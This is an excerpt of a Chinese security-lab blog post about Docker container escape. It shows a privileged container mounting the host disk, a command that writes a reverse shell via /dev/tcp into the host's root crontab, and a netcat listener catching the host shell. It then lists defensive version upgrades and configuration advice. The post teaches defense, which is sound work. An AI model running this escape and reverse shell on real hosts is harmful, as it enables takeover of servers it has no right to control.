美创安全实验室 | Docker逃逸原理
2020-07-31 17:50
美创科技
关注
同理,新建一个目录/test2,将/dev/sda3挂载到新建的目录下,并查看test2目录下的内容,发现可以访问宿主机上/目录下的内容了
在计划任务里写入一个反弹shell:
echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root
在Docker上开启netcat监听7777端口,成功接收到宿主主机的Shell,实现Docker逃逸。
Docker逃逸防御
更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736。
runc版本 >1.0-rc6
k8s 集群版本>1.12
Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)
Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险。
不建议以root权限运行Docker服务。
不建议以privileged(特权模式)启动Docker。
不建议将宿主机目录挂载至容器目录。
不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险。
美创科技聚焦数据安全,围绕数据安全、灾难备份、数据管理、智能运维等多方面挖掘和铸造数据价值,凭借卓越的产品技术和服务赢得了众多行业的认可和用户口碑!
分享
声明:
本文由入驻维科号的作者撰写,观点仅代表作者本人,不代表OFweek立场。如有侵权或其他问题,请联系举报。
图片新闻
最新活动更多
-
4月30日限时免费下载>> 高动态范围(eHDR)成像设计指南
-
6月18日立即报名>> 【线下会议】OFweek 2024(第九届)物联网产业大会
-
8月27-29日马上报名>>> 2024(第五届)全球数字经济产业大会暨展览会
-
精彩回顾立即查看>> 2024激光行业应用创新发展蓝皮书火热招编中!
-
精彩回顾立即查看>> 《2023云计算与通信5G类优秀产品&解决方案合集》
-
精彩回顾立即查看>> OFweek2023中国优.智算力年度评选
发表评论
请输入评论内容...
请输入评论/评论长度6~500个字
暂无评论
暂无评论